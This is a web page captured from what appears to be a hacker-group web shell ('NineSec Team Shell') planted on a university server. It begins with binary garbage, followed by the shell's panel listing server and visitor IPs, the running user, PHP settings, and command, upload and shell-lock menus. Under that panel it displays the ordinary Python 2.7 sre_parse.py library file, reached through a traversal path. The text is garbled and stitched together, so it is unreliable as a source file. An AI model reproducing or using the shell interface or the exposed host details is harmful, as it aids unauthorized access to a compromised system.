²•|qœáýý—˜kHß=”QpÆ�í¨ïºðŒ°áÃ#á ßÌ0�@ÎM@dpV'.h÷JË€À3ý­ B‡°bÀ— ·HLCIî�Œ‘¸á!3ðíð«@c)ÓvÛ±ú¤j¤Æ\}±••iÜîéûd&Wy´C§#�SElˆ¨“\˜|¬C;�ŠÃ9~¬c Vä��Ê„@¤m:N[±<¬ö´àÞé@ìÆHÇl&U4<�ʹ+ü›YôÙ;o?t!"ny/)œÝþˆB2„\Ÿý{?ûe?ƒôý�…F@ çì›Oú�…3ØÿÂU¿©@zïÖÕˆý?t!J%x9û! ÀÊ/ð‰?ÜoÑ@*ßåúÝc?éû!öÿ¼ðÿ¸ô!X€¾ÿüwÿißÙkÛûƒéþ…¢‹Ób[¿Ø‹ÿŠxxû! ˆ“.ÿ²Äþ¯¸B–G§ºÀs÷BY"³¶Ô›Hú¡ ç¿Ñ7•@G×óÕFÞ?Qú�ì„!DE3ý–öB/Ib‡ý¢¡jÿÞ?D!]gÿÙgzuncompress NineSec Team Shell
NineSec Team Shell
Server IP : 202.10.35.111  /  Your IP : 216.73.217.151
Web Server : Apache
System : Linux server.instiperjogja.ac.id 4.18.0-553.123.1.el8_10.x86_64 #1 SMP Tue May 5 04:00:43 EDT 2026 x86_64
User : nobody ( 65534)
PHP Version : 7.3.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0755) :  /usr/include/python2.7/../../../../sys/module/../../../lib64/python2.7/

[  Home  ][  C0mmand  ][  Upload File  ][  Lock Shell  ][  Logout  ]

Current File : //usr/include/python2.7/../../../../sys/module/../../../lib64/python2.7/sre_parse.py
#
# Secret Labs' Regular Expression Engine
#
# convert re-style regular expression to sre pattern
#
# Copyright (c) 1998-2001 by Secret Labs AB.  All rights reserved.
#
# See the sre.py file for information on usage and redistribution.
#

"""Internal support module for sre"""

# XXX: show string offset and offending character for all errors

import sys

from sre_constants import *

SPECIAL_CHARS = ".\\[{()*+?^$|"
REPEAT_CHARS = "*+?{"

DIGITS = set("0123456789")

OCTDIGITS = set("01234567")
HEXDIGITS = set("0123456789abcdefABCDEF")
ASCIILETTERS = set("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ")

WHITESPACE = set(" \t\n\r\v\f")

ESCAPES = {
    r"\a": (LITERAL, ord("\a")),
    r"\b": (LITERAL, ord("\b")),
    r"\f": (LITERAL, ord("\f")),
    r"\n": (LITERAL, ord("\n")),
    r"\r": (LITERAL, ord("\r")),
    r"\t": (LITERAL, ord("\t")),
    r"\v": (LITERAL, ord("\v")),
    r"\\": (LITERAL, ord("\\"))
}

CATEGORIES = {
    r"\A": (AT, AT_BEGINNING_STRING), # start of string
    r"\b": (AT, AT_BOUNDARY),
    r"\B": (AT, AT_NON_BOUNDARY),
    r"\d": (IN, [(CATEGORY, CATEGORY_DIGIT)]),
    r"\D": (IN, [(CATEGORY, CATEGORY_NOT_DIGIT)]),
    r"\s": (IN, [(CATEGORY, CATEGORY_SPACE)]),
    r"\S": (IN, [(CATEGORY, CATEGORY_NOT_SPACE)]),
    r"\w": (IN, [(CATEGORY, CATEGORY_WORD)]),
    r"\W": (IN, [(CATEGORY, CATEGORY_NOT_WORD)]),
    r"\Z": (AT, AT_END_STRING), # end of string
}

FLAGS = {
    # standard flags
    "i": SRE_FLAG_IGNORECASE,
    "L": SRE_FLAG_LOCALE,
    "m": SRE_FLAG_MULTILINE,
    "s": SRE_FLAG_DOTALL,
    "x": SRE_FLAG_VERBOSE,
    # extensions
    "t": SRE_FLAG_TEMPLATE,
    "u": SRE_FLAG_UNICODE,
}

class Pattern:
    # master pattern object.  keeps track of global attributes
    def __init__(self):
        self.flags = 0
        self.open = []
        self.groups = 1
        self.groupdict = {}
        self.lookbehind = 0

    def opengroup(self, name=None):
        gid = self.groups
        self.groups = gid + 1
        if name is not None:
            ogid = self.groupdict.get(name, None)
            if ogid is not None:
                raise error, ("redefinition of group name %s as group %d; "
                              "was group %d" % (repr(name), gid,  ogid))
            self.groupdict[name] = gid
        self.open.append(gid)
        return gid
    def closegroup(self, gid):
        self.open.remove(gid)
    def checkgroup(self, gid):
        return gid < self.groups and gid not in self.open

class SubPattern:
    # a subpattern, in intermediate form
    def __init__(self, pattern, data=None):
        self.pattern = pattern
        if data is None:
            data = []
        self.data = data
        self.width = None
    def dump(self, level=0):
        seqtypes = (tuple, list)
        for op, av in self.data:
            print level*"  " + op,
            if op == IN:
                # member sublanguage
                print
                for op, a in av:
                    print (level+1)*"  " + op, a
            elif op == BRANCH:
                print
                for i, a in enumerate(av[1]):
                    if i:
                        print level*"  " + "or"
                    a.dump(level+1)
            elif op == GROUPREF_EXISTS:
                condgroup, item_yes, item_no = av
                print condgroup
                item_yes.dump(level+1)
                if item_no:
                    print level*"  " + "else"
                    item_no.dump(level+1)
            elif isinstance(av, seqtypes):
                nl = 0
                for a in av:
                    if isinstance(a, SubPattern):
                        if not nl:
                            print
                        a.dump(level+1)
                        nl = 1
                    else:
                        print a,
                        nl = 0
                if not nl:
                    print
            else:
                print av
    def __repr__(self):
        return repr(self.data)
    def __len__(self):
        return len(self.data)
    def __delitem__(self, index):
        del self.data[index]
    def __getitem__(self, index):
        if isinstance(index, slice):
            return SubPattern(self.pattern, self.data[index])
        return self.data[index]
    def __setitem__(self, index, code):
        self.data[index] = code
    def insert(self, index, code):
        self.data.insert(index, code)
    def append(self, code):
        self.data.append(code)
    def getwidth(self):
        # determine the width (min, max) for this subpattern
        if self.width:
            return self.width
        lo = hi = 0
        UNITCODES = (ANY, RANGE, IN, LITERAL, NOT_LITERAL, CATEGORY)
        REPEATCODES = (MIN_REPEAT, MAX_REPEAT)
        for op, av in self.data:
            if op is BRANCH:
                i = MAXREPEAT - 1
                j = 0
                for av in av[1]:
                    l, h = av.getwidth()
                    i = min(i, l)
                    j = max(j, h)
                lo = lo + i
                hi = hi + j
            elif op is CALL:
                i, j = av.getwidth()
                lo = lo + i
                hi = hi + j
            elif op is SUBPATTERN:
                i, j = av[1].getwidth()
                lo = lo + i
                hi = hi + j
            elif op in REPEATCODES:
                i, j = av[2].getwidth()
                lo = lo + i * av[0]
                hi = hi + j * av[1]
            elif op in UNITCODES:
                lo = lo + 1
                hi = hi + 1
            elif op == SUCCESS:
                break
        self.width = min(lo, MAXREPEAT - 1), min(hi, MAXREPEAT)
        return self.width

class Tokenizer:
    def __init__(self, string):
        self.string = string
        self.index = 0
        self.__next()
    def __next(self):
        if self.index >= len(self.string):
            self.next = None
            return
        char = self.string[self.index]
        if char[0] == "\\":
            try:
                c = self.string[self.index + 1]
            except IndexError:
                raise error, "bogus escape (end of line)"
            char = char + c
        self.index = self.index + len(char)
        self.next = char
    def match(self, char, skip=1):
        if char == self.next:
            if skip:
                self.__next()
            return 1
        return 0
    def get(self):
        this = self.next
        self.__next()
        return this
    def tell(self):
        return self.index, self.next
    def seek(self, index):
        self.index, self.next = index

def isident(char):
    return "a" <= char <= "z" or "A" <= char <= "Z" or char == "_"

def isdigit(char):
    return "0" <= char <= "9"

def isname(name):
    # check that group name is a valid string
    if not isident(name[0]):
        return False
    for char in name[1:]:
        if not isident(char) and not isdigit(char):
            return False
    return True

def _class_escape(source, escape, nested):
    # handle escape code inside character class
    code = ESCAPES.get(escape)
    if code:
        return code
    code = CATEGORIES.get(escape)
    if code and code[0] == IN:
        return code
    try:
        c = escape[1:2]
        if c == "x":
            # hexadecimal escape (exactly two digits)
            while source.next in HEXDIGITS and len(escape) < 4:
                escape = escape + source.get()
            escape = escape[2:]
            if len(escape) != 2:
                raise error, "bogus escape: %s" % repr("\\" + escape)
            return LITERAL, int(escape, 16) & 0xff
        elif c in OCTDIGITS:
            # octal escape (up to three digits)
            while source.next in OCTDIGITS and len(escape) < 4:
                escape = escape + source.get()
            escape = escape[1:]
            return LITERAL, int(escape, 8) & 0xff
        elif c in DIGITS:
            raise error, "bogus escape: %s" % repr(escape)
        if len(escape) == 2:
            if sys.py3kwarning and c in ASCIILETTERS:
                import warnings
                if c in 'Uu':
                    warnings.warn('bad escape %s; Unicode escapes are '
                                  'supported only since Python 3.3' % escape,
                                  FutureWarning, stacklevel=nested + 6)
                else:
                    warnings.warnpy3k('bad escape %s' % escape,
                                      DeprecationWarning, stacklevel=nested + 6)
            return LITERAL, ord(escape[1])
    except ValueError:
        pass
    raise error, "bogus escape: %s" % repr(escape)

def _escape(source, escape, state, nested):
    # handle escape code in expression
    code = CATEGORIES.get(escape)
    if code:
        return code
    code = ESCAPES.get(escape)
    if code:
        return code
    try:
        c = escape[1:2]
        if c == "x":
            # hexadecimal escape
            while source.next in HEXDIGITS and len(escape) < 4:
                escape = escape + source.get()
            if len(escape) != 4:
                raise ValueError
            return LITERAL, int(escape[2:], 16) & 0xff
        elif c == "0":
            # octal escape
            while source.next in OCTDIGITS and len(escape) < 4:
                escape = escape + source.get()
            return LITERAL, int(escape[1:], 8) & 0xff
        elif c in DIGITS:
            # octal escape *or* decimal group reference (sigh)
            if source.next in DIGITS:
                escape = escape + source.get()
                if (escape[1] in OCTDIGITS and escape[2] in OCTDIGITS and
                    source.next in OCTDIGITS):
                    # got three octal digits; this is an octal escape
                    escape = escape + source.get()
                    return LITERAL, int(escape[1:], 8) & 0xff
            # not an octal escape, so this is a group reference
            group = int(escape[1:])
            if group < state.groups:
                if not state.checkgroup(group):
                    raise error, "cannot refer to open group"
                if state.lookbehind:
                    import warnings
                    warnings.warn('group references in lookbehind '
                                  'assertions are not supported',
                                  RuntimeWarning, stacklevel=nested + 6)
                return GROUPREF, group
            raise ValueError
        if len(escape) == 2:
            if sys.py3kwarning and c in ASCIILETTERS:
                import warnings
                if c in 'Uu':
                    warnings.warn('bad escape %s; Unicode escapes are '
                                  'supported only since Python 3.3' % escape,
                                  FutureWarning, stacklevel=nested + 6)
                else:
                    warnings.warnpy3k('bad escape %s' % escape,
                                      DeprecationWarning, stacklevel=nested + 6)
            return LITERAL, ord(escape[1])
    except ValueError:
        pass
    raise error, "bogus escape: %s" % repr(escape)

def _parse_sub(source, state, nested):
    # parse an alternation: a|b|c

    items = []
    itemsappend = items.append
    sourcematch = source.match
    while 1:
        itemsappend(_parse(source, state, nested + 1))
        if sourcematch("|"):
            continue
        if not nested:
            break
        if not source.next or sourcematch(")", 0):
            break
        else:
            raise error, "pattern not properly closed"

    if len(items) == 1:
        return items[0]

    subpattern = SubPattern(state)
    subpatternappend = subpattern.append

    # check if all items share a common prefix
    while 1:
        prefix = None
        for item in items:
            if not item:
                break
            if prefix is None:
                prefix = item[0]
            elif item[0] != prefix:
                break
        else:
            # all subitems start with a common "prefix".
            # move it out of the branch
            for item in items:
                del item[0]
            subpatternappend(prefix)
            continue # check next one
        break

    # check if the branch can be replaced by a character set
    for item in items:
        if len(item) != 1 or item[0][0] != LITERAL:
            break
    else:
        # we can store this as a character set instead of a
        # branch (the compiler may optimize this even more)
        set = []
        setappend = set.append
        for item in items:
            setappend(item[0])
        subpatternappend((IN, set))
        return subpattern

    subpattern.append((BRANCH, (None, items)))
    return subpattern

def _parse_sub_cond(source, state, condgroup, nested):
    item_yes = _parse(source, state, nested + 1)
    if source.match("|"):
        item_no = _parse(source, state, nested + 1)
        if source.match("|"):
            raise error, "conditional backref with more than two branches"
    else:
        item_no = None
    if source.next and not source.match(")", 0):
        raise error, "pattern not properly closed"
    subpattern = SubPattern(state)
    subpattern.append((GROUPREF_EXISTS, (condgroup, item_yes, item_no)))
    return subpattern

_PATTERNENDERS = set("|)")
_ASSERTCHARS = set("=!<")
_LOOKBEHINDASSERTCHARS = set("=!")
_REPEATCODES = set([MIN_REPEAT, MAX_REPEAT])

def _parse(source, state, nested):
    # parse a simple pattern
    subpattern = SubPattern(state)

    # precompute constants into local variables
    subpatternappend = subpattern.append
    sourceget = source.get
    sourcematch = source.match
    _len = len
    PATTERNENDERS = _PATTERNENDERS
    ASSERTCHARS = _ASSERTCHARS
    LOOKBEHINDASSERTCHARS = _LOOKBEHINDASSERTCHARS
    REPEATCODES = _REPEATCODES

    while 1:

        if source.next in PATTERNENDERS:
            break # end of subpattern
        this = sourceget()
        if this is None:
            break # end of pattern

        if state.flags & SRE_FLAG_VERBOSE:
            # skip whitespace and comments
            if this in WHITESPACE:
                continue
            if this == "#":
                while 1:
                    this = sourceget()
                    if this in (None, "\n"):
                        break
                continue

        if this and this[0] not in SPECIAL_CHARS:
            subpatternappend((LITERAL, ord(this)))

        elif this == "[":
            # character set
            set = []
            setappend = set.append
##          if sourcematch(":"):
##              pass # handle character classes
            if sourcematch("^"):
                setappend((NEGATE, None))
            # check remaining characters
            start = set[:]
            while 1:
                this = sourceget()
                if this == "]" and set != start:
                    break
                elif this and this[0] == "\\":
                    code1 = _class_escape(source, this, nested + 1)
                elif this:
                    code1 = LITERAL, ord(this)
                else:
                    raise error, "unexpected end of regular expression"
                if sourcematch("-"):
                    # potential range
                    this = sourceget()
                    if this == "]":
                        if code1[0] is IN:
                            code1 = code1[1][0]
                        setappend(code1)
                        setappend((LITERAL, ord("-")))
                        break
                    elif this:
                        if this[0] == "\\":
                            code2 = _class_escape(source, this, nested + 1)
                        else:
                            code2 = LITERAL, ord(this)
                        if code1[0] != LITERAL or code2[0] != LITERAL:
                            raise error, "bad character range"
                        lo = code1[1]
                        hi = code2[1]
                        if hi < lo:
                            raise error, "bad character range"
                        setappend((RANGE, (lo, hi)))
                    else:
                        raise error, "unexpected end of regular expression"
                else:
                    if code1[0] is IN:
                        code1 = code1[1][0]
                    setappend(code1)

            # XXX: <fl> should move set optimization to compiler!
            if _len(set)==1 and set[0][0] is LITERAL:
                subpatternappend(set[0]) # optimization
            elif _len(set)==2 and set[0][0] is NEGATE and set[1][0] is LITERAL:
                subpatternappend((NOT_LITERAL, set[1][1])) # optimization
            else:
                # XXX: <fl> should add charmap optimization here
                subpatternappend((IN, set))

        elif this and this[0] in REPEAT_CHARS:
            # repeat previous item
            if this == "?":
                min, max = 0, 1
            elif this == "*":
                min, max = 0, MAXREPEAT

            elif this == "+":
                min, max = 1, MAXREPEAT
            elif this == "{":
                if source.next == "}":
                    subpatternappend((LITERAL, ord(this)))
                    continue
                here = source.tell()
                min, max = 0, MAXREPEAT
                lo = hi = ""
                while source.next in DIGITS:
                    lo = lo + source.get()
                if sourcematch(","):
                    while source.next in DIGITS:
                        hi = hi + sourceget()
                else:
                    hi = lo
                if not sourcematch("}"):
                    subpatternappend((LITERAL, ord(this)))
                    source.seek(here)
                    continue
                if lo:
                    min = int(lo)
                    if min >= MAXREPEAT:
                        raise OverflowError("the repetition number is too large")
                if hi:
                    max = int(hi)
                    if max >= MAXREPEAT:
                        raise OverflowError("the repetition number is too large")
                    if max < min:
                        raise error("bad repeat interval")
            else:
                raise error, "not supported"
            # figure out which item to repeat
            if subpattern:
                item = subpattern[-1:]
            else:
                item = None
            if not item or (_len(item) == 1 and item[0][0] == AT):
                raise error, "nothing to repeat"
            if item[0][0] in REPEATCODES:
                raise error, "multiple repeat"
            if sourcematch("?"):
                subpattern[-1] = (MIN_REPEAT, (min, max, item))
            else:
                subpattern[-1] = (MAX_REPEAT, (min, max, item))

        elif this == ".":
            subpatternappend((ANY, None))

        elif this == "(":
            group = 1
            name = None
            condgroup = None
            if sourcematch("?"):
                group = 0
                # options
                if sourcematch("P"):
                    # python extensions
                    if sourcematch("<"):
                        # named group: skip forward to end of name
                        name = ""
                        while 1:
                            char = sourceget()
                            if char is None:
                                raise error, "unterminated name"
                            if char == ">":
                                break
                            name = name + char
                        group = 1
                        if not name:
                            raise error("missing group name")
                        if not isname(name):
                            raise error("bad character in group name %r" %
                                        name)
                    elif sourcematch("="):
                        # named backreference
                        name = ""
                        while 1:
                            char = sourceget()
                            if char is None:
                                raise error, "unterminated name"
                            if char == ")":
                                break
                            name = name + char
                        if not name:
                            raise error("missing group name")
                        if not isname(name):
                            raise error("bad character in backref group name "
                                        "%r" % name)
                        gid = state.groupdict.get(name)
                        if gid is None:
                            msg = "unknown group name: {0!r}".format(name)
                            raise error(msg)
                        if state.lookbehind:
                            import warnings
                            warnings.warn('group references in lookbehind '
                                          'assertions are not supported',
                                          RuntimeWarning, stacklevel=nested + 6)
                        subpatternappend((GROUPREF, gid))
                        continue
                    else:
                        char = sourceget()
                        if char is None:
                            raise error, "unexpected end of pattern"
                        raise error, "unknown specifier: ?P%s" % char
                elif sourcematch(":"):
                    # non-capturing group
                    group = 2
                elif sourcematch("#"):
                    # comment
                    while 1:
                        if source.next is None or source.next == ")":
                            break
                        sourceget()
                    if not sourcematch(")"):
                        raise error, "unbalanced parenthesis"
                    continue
                elif source.next in ASSERTCHARS:
                    # lookahead assertions
                    char = sourceget()
                    dir = 1
                    if char == "<":
                        if source.next not in LOOKBEHINDASSERTCHARS:
                            raise error, "syntax error"
                        dir = -1 # lookbehind
                        char = sourceget()
                        state.lookbehind += 1
                    p = _parse_sub(source, state, nested + 1)
                    if dir < 0:
                        state.lookbehind -= 1
                    if not sourcematch(")"):
                        raise error, "unbalanced parenthesis"
                    if char == "=":
                        subpatternappend((ASSERT, (dir, p)))
                    else:
                        subpatternappend((ASSERT_NOT, (dir, p)))
                    continue
                elif sourcematch("("):
                    # conditional backreference group
                    condname = ""
                    while 1:
                        char = sourceget()
                        if char is None:
                            raise error, "unterminated name"
                        if char == ")":
                            break
                        condname = condname + char
                    group = 2
                    if not condname:
                        raise error("missing group name")
                    if isname(condname):
                        condgroup = state.groupdict.get(condname)
                        if condgroup is None:
                            msg = "unknown group name: {0!r}".format(condname)
                            raise error(msg)
                    else:
                        try:
                            condgroup = int(condname)
                        except ValueError:
                            raise error, "bad character in group name"
                    if state.lookbehind:
                        import warnings
                        warnings.warn('group references in lookbehind '
                                      'assertions are not supported',
                                      RuntimeWarning, stacklevel=nested + 6)
                else:
                    # flags
                    if not source.next in FLAGS:
                        raise error, "unexpected end of pattern"
                    while source.next in FLAGS:
                        state.flags = state.flags | FLAGS[sourceget()]
            if group:
                # parse group contents
                if group == 2:
                    # anonymous group
                    group = None
                else:
                    group = state.opengroup(name)
                if condgroup:
                    p = _parse_sub_cond(source, state, condgroup, nested + 1)
                else:
                    p = _parse_sub(source, state, nested + 1)
                if not sourcematch(")"):
                    raise error, "unbalanced parenthesis"
                if group is not None:
                    state.closegroup(group)
                subpatternappend((SUBPATTERN, (group, p)))
            else:
                while 1:
                    char = sourceget()
                    if char is None:
                        raise error, "unexpected end of pattern"
                    if char == ")":
                        break
                    raise error, "unknown extension"

        elif this == "^":
            subpatternappend((AT, AT_BEGINNING))

        elif this == "$":
            subpattern.append((AT, AT_END))

        elif this and this[0] == "\\":
            code = _escape(source, this, state, nested + 1)
            subpatternappend(code)

        else:
            raise error, "parser error"

    return subpattern

def parse(str, flags=0, pattern=None):
    # parse 're' pattern into list of (opcode, argument) tuples

    source = Tokenizer(str)

    if pattern is None:
        pattern = Pattern()
    pattern.flags = flags
    pattern.str = str

    p = _parse_sub(source, pattern, 0)
    if (sys.py3kwarning and
        (p.pattern.flags & SRE_FLAG_LOCALE) and
        (p.pattern.flags & SRE_FLAG_UNICODE)):
        import warnings
        warnings.warnpy3k("LOCALE and UNICODE flags are incompatible",
                          DeprecationWarning, stacklevel=5)

    tail = source.get()
    if tail == ")":
        raise error, "unbalanced parenthesis"
    elif tail:
        raise error, "bogus characters at end of regular expression"

    if not (flags & SRE_FLAG_VERBOSE) and p.pattern.flags & SRE_FLAG_VERBOSE:
        # the VERBOSE flag was switched on inside the pattern.  to be
        # on the safe side, we'll parse the whole thing again...
        return parse(str, p.pattern.flags)

    if flags & SRE_FLAG_DEBUG:
        p.dump()

    return p

def parse_template(source, pattern):
    # parse 're' replacement string into list of literals and
    # group references
    s = Tokenizer(source)
    sget = s.get
    p = []
    a = p.append
    def literal(literal, p=p, pappend=a):
        if p and p[-1][0] is LITERAL:
            p[-1] = LITERAL, p[-1][1] + literal
        else:
            pappend((LITERAL, literal))
    sep = source[:0]
    if type(sep) is type(""):
        makechar = chr
    else:
        makechar = unichr
    while 1:
        this = sget()
        if this is None:
            break # end of replacement string
        if this and this[0] == "\\":
            # group
            c = this[1:2]
            if c == "g":
                name = ""
                if s.match("<"):
                    while 1:
                        char = sget()
                        if char is None:
                            raise error, "unterminated group name"
                        if char == ">":
                            break
                        name = name + char
                if not name:
                    raise error, "missing group name"
                try:
                    index = int(name)
                    if index < 0:
                        raise error, "negative group number"
                except ValueError:
                    if not isname(name):
                        raise error, "bad character in group name"
                    try:
                        index = pattern.groupindex[name]
                    except KeyError:
                        msg = "unknown group name: {0!r}".format(name)
                        raise IndexError(msg)
                a((MARK, index))
            elif c == "0":
                if s.next in OCTDIGITS:
                    this = this + sget()
                    if s.next in OCTDIGITS:
                        this = this + sget()
                literal(makechar(int(this[1:], 8) & 0xff))
            elif c in DIGITS:
                isoctal = False
                if s.next in DIGITS:
                    this = this + sget()
                    if (c in OCTDIGITS and this[2] in OCTDIGITS and
                        s.next in OCTDIGITS):
                        this = this + sget()
                        isoctal = True
                        literal(makechar(int(this[1:], 8) & 0xff))
                if not isoctal:
                    a((MARK, int(this[1:])))
            else:
                try:
                    this = makechar(ESCAPES[this][1])
                except KeyError:
                    if sys.py3kwarning and c in ASCIILETTERS:
                        import warnings
                        warnings.warnpy3k('bad escape %s' % this,
                                          DeprecationWarning, stacklevel=4)
                literal(this)
        else:
            literal(this)
    # convert template to groups and literals lists
    i = 0
    groups = []
    groupsappend = groups.append
    literals = [None] * len(p)
    for c, s in p:
        if c is MARK:
            groupsappend((i, s))
            # literal[i] is already None
        else:
            literals[i] = s
        i = i + 1
    return groups, literals

def expand_template(template, match):
    g = match.group
    sep = match.string[:0]
    groups, literals = template
    literals = literals[:]
    try:
        for index, group in groups:
            literals[index] = s = g(group)
            if s is None:
                raise error, "unmatched group"
    except IndexError:
        raise error, "invalid group reference"
    return sep.join(literals)

NineSec Team - 2022